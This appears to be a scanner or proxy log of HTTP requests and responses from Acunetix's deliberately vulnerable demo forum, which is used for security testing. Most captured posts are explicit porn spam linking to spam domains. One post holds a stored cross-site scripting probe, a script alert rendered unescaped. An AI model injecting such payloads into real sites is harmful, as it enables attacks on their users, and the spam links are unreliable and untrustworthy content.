Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately 